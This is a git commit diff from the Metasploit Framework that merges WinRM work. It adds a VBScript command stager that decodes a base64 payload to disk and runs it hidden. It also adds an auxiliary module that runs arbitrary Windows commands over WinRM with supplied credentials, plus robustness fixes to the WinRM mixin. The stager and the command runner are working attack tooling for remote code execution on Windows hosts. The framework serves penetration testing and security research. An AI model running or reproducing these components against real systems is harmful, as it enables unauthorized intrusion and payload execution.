Merge branch 'WinRM_piecemeal' of https://github.com/dmaloney-r7/metasploit-framework into dmaloney-r7-WinRM_piecemeal

jvazquez-r7 · jvazquez-r7 · commit 9166d12179c8 · 2012-11-05T23:08:59.000+01:00
diff --git a/data/exploits/cmdstager/vbs_b64_sleep b/data/exploits/cmdstager/vbs_b64_sleep
@@ -0,0 +1,41 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb
@@ -17,6 +17,7 @@ module Exploit::Remote::WinRM
 	NTLM_CONST ||= Rex::Proto::NTLM::Constants
 	NTLM_UTILS ||= Rex::Proto::NTLM::Utils
 	NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions
+
 	def initialize(info = {})
 		super
 		register_options(
@@ -61,13 +62,17 @@ def parse_auth_methods(resp)
 
 	def winrm_run_cmd(cmd, timeout=20)
 		resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+		if resp.nil?
+			print_error "Recieved no reply from server"
+			return nil
+		end
 		if resp.code == 401
 			print_error "Login failure! Recheck supplied credentials."
 			return resp .code
 		end
 		unless resp.code == 200
 			print_error "Got unexpected response: \n #{resp.to_s}"
-			retval == resp.code || 0
+			retval = resp.code || 0
 			return retval
 		end
 		shell_id = winrm_get_shell_id(resp)
@@ -80,6 +85,29 @@ def winrm_run_cmd(cmd, timeout=20)
 		return streams
 	end
 
+	def winrm_run_cmd_hanging(cmd, timeout=20)
+		resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+		if resp.nil?
+			print_error "Recieved no reply from server"
+			return nil
+		end
+		if resp.code == 401
+			print_error "Login failure! Recheck supplied credentials."
+			return resp .code
+		end
+		unless resp.code == 200
+			print_error "Got unexpected response: \n #{resp.to_s}"
+			retval = resp.code || 0
+			return retval
+		end
+		shell_id = winrm_get_shell_id(resp)
+		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
+		cmd_id = winrm_get_cmd_id(resp)
+		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
+		streams = winrm_get_cmd_streams(resp)
+		return streams
+	end
+
 	def winrm_wql_msg(wql)
 		action = winrm_uri_action("wql")
 		contents = winrm_header(action) + winrm_wql_body(wql)
@@ -134,6 +162,7 @@ def winrm_delete_shell_msg(shell_id)
 	end
 
 	def parse_wql_response(response)
+		return nil if response.nil?
 		xml = response.body
 		columns = []
 		rows =[]
@@ -160,16 +189,19 @@ def parse_wql_response(response)
 	end
 
 	def winrm_get_shell_id(response)
+		return nil if response.nil?
 		xml = response.body
 		shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
 	end
 
 	def winrm_get_cmd_id(response)
+		return nil if response.nil?
 		xml = response.body
 		cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
 	end
 
 	def winrm_get_cmd_streams(response)
+		return nil if response.nil?
 		streams = {
 			'stdout' => '',
 			'stderr'   => '',
@@ -178,7 +210,7 @@ def winrm_get_cmd_streams(response)
 		rxml = REXML::Document.new(xml).root
 		rxml.elements.to_a("//rsp:Stream").each do |node|
 			next if node.text.nil?
-			streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text)
+			streams[node.attributes['Name']] << Rex::Text.decode_base64(node.text)
 		end
 		return streams
 	end
@@ -291,6 +323,7 @@ def target_url
 		end
 	end
 
+
 	private
 
 	def winrm_option_set(options)
diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb
@@ -0,0 +1,63 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::WinRM
+	include Msf::Auxiliary::Report
+
+
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'           => 'WinRM Command Runner',
+			'Description'    => %q{
+				This module runs arbitrary Windows commands using the WinRM Service
+				},
+			'Author'         => [ 'thelightcosine' ],
+			'License'        => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				OptString.new('CMD', [ true, "The windows command to run", "ipconfig /all" ]),
+				OptString.new('USERNAME', [ true, "The username to authenticate as"]),
+				OptString.new('PASSWORD', [ true, "The password to authenticate with"]),
+				OptBool.new('SAVE_OUTPUT', [true, "Store output as loot", false])
+			], self.class)
+	end
+
+
+	def run_host(ip)
+		unless accepts_ntlm_auth
+			print_error "The Remote WinRM  server  (#{ip} does not appear to allow Negotiate(NTLM) auth"
+			return
+		end
+		streams = winrm_run_cmd(datastore['CMD'])
+		return unless streams.class == Hash
+		print_error streams['stderr'] unless streams['stderr'] == ''
+		print_good streams['stdout']
+		if datastore['SAVE_OUTPUT']
+			path = store_loot("winrm.cmd_results", "text/plain", ip, streams['stdout'], "winrm_cmd_results.txt", "WinRM CMD Results")
+			print_status "Results saved to #{path}"
+		end
+	end
+
+
+
+end
diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -29,7 +29,8 @@ def initialize
 				This module attempts to authenticate to a WinRM service. It currently
 				works only if the remote end allows Negotiate(NTLM) authentication.
 				Kerberos is not currently supported.  Please note: in order to use this
-				module, the 'AllowUnencrypted' winrm option must be set.
+				module without SSL, the 'AllowUnencrypted' winrm option must be set.
+				Otherwise adjust the port and set the SSL options in the module as appropriate.
 			},
 			'Author'         => [ 'thelightcosine' ],
 			'References'     =>
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb
diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb
